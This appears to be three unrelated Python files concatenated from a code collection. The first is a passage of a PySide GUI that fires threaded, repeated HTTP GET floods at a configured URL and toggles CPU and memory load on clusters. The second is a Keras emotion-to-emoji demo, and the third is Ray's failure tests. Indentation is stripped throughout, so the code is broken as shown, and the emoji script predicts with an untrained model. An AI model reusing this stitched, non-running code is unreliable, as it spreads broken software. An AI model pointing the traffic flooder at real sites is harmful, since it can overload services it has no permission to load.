contry = self.acombobox.currentText()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("pwnbit.kr",443))
self.abuttonmessage.setText("[Status] : <font color=\"green\">Connected</font><br>[Contry] : "+contry+"\n[IPaddr] : "+sock.getsockname()[0])
# proc = Process(target=buttonA_func,args=(even))
# proc.start()
self.processlist[0] = 1
def requestTraffic(self, i, reqPerTh):
url = Global.Traffic_URL
for n in range (0, reqPerTh):
reqNum = (reqPerTh*i)+n
print("Http Get(",reqNum,") Request Start")
response = requests.get(url, verify=False, allow_redirects=False, stream=True)
print("Status code (",reqNum,"):", response.status_code)
def buttonC_func_SendTraffic(self, connectedNum):
while True:
ths = []
reqPerTh = 100
thNum = int(connectedNum/reqPerTh)
for i in range(0,thNum):
th = Thread(target=self.requestTraffic, args=(i,reqPerTh))
#proc = Process(target=self.requestTraffic, args=(i,))
#proc.daemon = True
ths.append(th)
th.start()
for th in ths:
th.join()
# if self.eventC.is_set():
# print("Traffic Ended")
# break
print("Traffic wait for "+str(Global.Traffic_Period)+"s")
time.sleep(Global.Traffic_Period)
def buttonC_func_DisConnect(self):
#self.eventC.set()
self.procTraffic.kill()
print("C Disconnet func")
print("Traffic Ended")
def buttonC_Start_event(self): # 버튼 C 시작 이벤트 처리
if self.processlist[2] != 0:
self.cbuttonstart.setStyle(4)
#self.setStyle(self.cbuttonstart,1)
self.buttonC_func_DisConnect()
self.cbuttonstart.setText("Send")
self.cbuttonmessage.setText("[Status] : <font color=\"red\">Disable</font>")
self.processlist[2] = 0
else:
#self.setStyle(self.cbuttonstart,2)
self.cbuttonstart.setStyle(5)
# if self.eventC.is_set():
# self.eventC = Event()
connectedNum = int(self.ccombobox.currentText())
print("C Connect func Text is :", connectedNum)
self.procTraffic = Process(target=self.buttonC_func_SendTraffic, args=(connectedNum,))
self.procTraffic.daemon = True
self.procTraffic.start()
self.cbuttonstart.setText("Stop")
self.cbuttonmessage.setText("[Status] : <font color=\"green\">Enable</font><br>[CCU] : "+str(connectedNum)+"<br>[Period] : "+str(Global.Traffic_Period)+"s<br>[Target] : "+Global.Traffic_URL)
# proc = Process(target=buttonA_func,args=(even))
# proc.start()
self.processlist[2] = 1
def getLoadGenStatusAndSetText(self):
for i, sysinfo in enumerate(self.sysbenchInfoList):
print(sysinfo.svcIP,sysinfo.svcPort)
response = requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/status")
response.raise_for_status()
if response.text != "":
maxlevel = 0
print(response.text)
findflag = False
substring = " Status : START / Level : "
for item in response.text.split("\n"):
if substring in item:
findflag = True
level = int(item.split(substring)[1])
maxlevel = max(maxlevel, level)
if findflag:
j = self.bcombobox.findText(sysinfo.clusterName)
self.sysbenchInfoList[j].loadLevel = maxlevel
self.BClusterList[j].set()
self.setGenText()
def setGenText(self):
Bmessegetext = ""
for i in range (len(self.BClusterList)) :
if self.BClusterList[i].is_set() == True :
Bmessegetext = Bmessegetext + "["+ self.sysbenchInfoList[i].clusterName + "] : <font color=\"green\">ON</font>, [Load Level] :" + str(self.sysbenchInfoList[i].loadLevel) + "<br>"
self.bbuttonmessage.setText(Bmessegetext)
def buttonB_Start_event(self):
if self.m_gif_flag == True:
return
if self.BClusterList[self.bcombobox.currentIndex()].is_set() :
print("Cluster '" + self.bcombobox.currentText() + "' is Running")
return
self.BClusterList[self.bcombobox.currentIndex()].set()
for i, sysinfo in enumerate(self.sysbenchInfoList):
if self.sysbenchInfoList[i].clusterName == self.bcombobox.currentText():
self.sysbenchInfoList[i].loadLevel = self.bcombobox2.currentText()
break
# if self.bcombobox.currentText.eventB.is_set():
# self.bcombobox.currentText.eventB = Event()
# self.bbuttonmessage.setText("Start")
params = (
('v', str(sysinfo.loadLevel)),
)
requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/cpu/start", params=params)
requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/memory/start", params=params)
# self.bcombobox.currentText.processlist[1] = 1
self.setGenText()
def hideLoadingUI(self):
self.m_movie_gif.stop()
self.m_label_gif.hide()
self.setGenText()
self.m_gif_flag = False
def buttonB_Stop_event(self):
if self.m_gif_flag == True:
return
self.m_gif_flag = True
# self.bcombobox.currentText.eventB.set()
# self.bcombobox.currentText.processlist[1] = 0
self.BClusterList[self.bcombobox.currentIndex()].clear()
#self.bbuttonmessage.setText("Stop")
for i, sysinfo in enumerate(self.sysbenchInfoList):
if self.sysbenchInfoList[i].clusterName == self.bcombobox.currentText():
break
self.m_movie_gif.start()
self.m_label_gif.show()
self.th = Task(sysinfo)
Global.signal.stopBbtnCompleteSignal.connect(self.hideLoadingUI)
self.th.start()
class Task(QThread):
def __init__(self, sysinfo):
super().__init__()
self.sysinfo = sysinfo
def run(self):
requests.get("http://"+self.sysinfo.svcIP+":"+str(self.sysinfo.svcPort)+"/cpu/stop")
requests.get("http://"+self.sysinfo.svcIP+":"+str(self.sysinfo.svcPort)+"/memory/stop")
Global.signal.stopBbtnCompleteSignal.emit()
if __name__ == '__main__':
print(sys.path)
#QCoreApplication.setLibraryPaths([sys.path[5] + '/PySide2/plugins'])
app = QApplication(sys.argv)
window = Form()
window.show()
app.exec_()
|
emoji.py | import tkinter
from tkinter import *
import tkinter
import cv2
from PIL import Image, ImageTk
import os
import numpy as np
import cv2
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D
from keras.optimizer_v2 import adam
from keras.layers import MaxPooling2D
from keras.preprocessing.image import ImageDataGenerator
import threading
os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'
#making model using squential and adding layers
emotion_model = Sequential()
emotion_model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(48,48,1)))
emotion_model.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Dropout(0.25))
emotion_model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Dropout(0.25))
emotion_model.add(Flatten())
emotion_model.add(Dense(1024, activation='relu'))
emotion_model.add(Dropout(0.5))
emotion_model.add(Dense(7, activation='softmax'))
emotion_model.save_weights('model4.h5')
cv2.ocl.setUseOpenCL(False)
#Creating the dictionary for all the emotions that we have.
emotion_dict = {0: " Angry ",1: " Disgusted " ,2:" Frearful ",3:" Happy ",4:" Neutral ",5:" Sad ",6 : " Surprised " }
cur_path = os.path.dirname(os.path.abspath(__file__))
emoji_dist = {0:cur_path+"/emojis/angry.png",1:cur_path+"/emojis/disgusted.png",2:cur_path+"/emojis/fearful.png",3:cur_path+"/emojis/happy.png",4:cur_path+"/emojis/neutral.png",5:cur_path+"/emojis/sad.png",6:cur_path+"/emojis/surpriced.png",}
global last_frame1
last_frame1 = np.zeros((480 , 640, 3), dtype=np.uint8)
global cap1
show_text=[0]
global frame_number
#video processing function
def show_subject():
cap1 = cv2.VideoCapture(r'C:\Users\Sajid\OneDrive\Desktop\Azam.mp4')
if not cap1.isOpened():
print("cant open the camera1")
global frame_number
length = int(cap1.get(cv2.CAP_PROP_FRAME_COUNT))
frame_number += 1
if frame_number >= length:
exit()
cap1.set(1,frame_number)
flag1, frame1 = cap1.read()
frame1 = cv2.resize (frame1,(500,650))
bounding_box = cv2.CascadeClassifier(r'C:\Users\Sajid\anaconda3\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml')
gray_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
num_faces = bounding_box.detectMultiScale(gray_frame,scaleFactor =1.3 ,minNeighbors = 5)
for(x,y,w,h) in num_faces:
cv2.rectangle(frame1,(x,y-50),(x+w , y+h+10),(255,0,0) ,2)
roi_gray_frame = gray_frame[y:y + h, x:x + w]
cropped_img = np.expand_dims(np.expand_dims(cv2.resize(roi_gray_frame,(48,48)), -1 ), 0)
prediction = emotion_model.predict(cropped_img)
maxindex= int(np.argmax(prediction))
cv2.putText(frame1, emotion_dict[maxindex], (x+20 , y-60), cv2.FONT_HERSHEY_SIMPLEX ,1, (255, 255, 255), 2, cv2.LINE_AA)
show_text[0] = maxindex
if flag1 is None:
print ("Major error!")
elif flag1:
global last_frame1
last_frame1= frame1.copy()
pic = cv2.cvtColor(last_frame1 ,cv2.COLOR_BGR2RGB)
img = Image.fromarray(pic)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
root.update()
lmain.after(10, show_subject)
if cv2.waitKey(1) & 0xFF == ord('q'):
exit()
#Avatar
def show_avatar():
frame2=cv2.imread(emoji_dist[show_text[0]])
pic2=cv2.cvtColor(frame2,cv2.COLOR_BGR2RGB)
img2=Image.fromarray(frame2)
imgtk2=ImageTk.PhotoImage(image=img2)
lmain2.imgtk2=imgtk2
lmain3.configure(text=emotion_dict[show_text[0]],font=('arial',45,'bold'))
lmain2.configure(image=imgtk2)
root.update()
lmain2.after(10, show_avatar)
# main function
if __name__ == '__main__':
frame_number = 0
root=tkinter.Tk()
lmain = tkinter.Label(master=root,padx=50,bd=10)
lmain2 = tkinter.Label(master=root,bd=10)
lmain3 = tkinter.Label(master=root,bd=10, fg="#CDCDCD", bg='black')
lmain.pack(side=LEFT)
lmain.place(x=50,y=250)
lmain3.pack()
lmain3.place(x=960,y=250)
lmain2.pack(side=RIGHT)
lmain2.place(x=900,y=350)
root.title("Photo of Emoji")
root.geometry("1400x900+100+10")
root['bg']='black'
exitButton = Button(root, text='Quit',fg = "red", command=root.destroy, font= ('arial',25,'bold')).pack (side= BOTTOM)
threading.Thread(target=show_subject).start()
threading.Thread(target=show_avatar).start()
root.mainloop()
|
test_failure.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray.test_utils import (
relevant_errors,
wait_for_errors,
RayTestTimeoutException,
)
RAY_FORCE_DIRECT = ray_constants.direct_call_enabled()
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_2_cpus):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) >= 2, errors
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
assert len(ray.errors()) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
ray.experimental.signal.reset = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote(max_reconstructions=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_reconstructions=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor:
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(
ray.errors()) == 0, ("Should not have propogated an error - {}".format(
ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(ray_start_2_cpus):
@ray.remote
def f():
pass
# Wait for the monitor process to start.
ray.get(f.remote())
time.sleep(1)
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylet and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.Value("HEARTBEAT_BATCH"),
ray.gcs_utils.TablePubsub.Value("HEARTBEAT_BATCH_PUBSUB"), fake_id,
malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
@pytest.mark.skipif(RAY_FORCE_DIRECT, reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(shutdown_only):
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
wait_for_errors(ray_constants.RESOURCE_DEADLOCK_ERROR, 1, timeout=30)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h():
time.sleep(1)
ray.get(f.remote())
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(h.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(ray.ObjectID.from_random())
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = json.dumps({
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
})
cluster = Cluster()
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(address=cluster.address)
info = relevant_errors(ray_constants.REMOVED_NODE_ERROR)
assert len(info) == 0
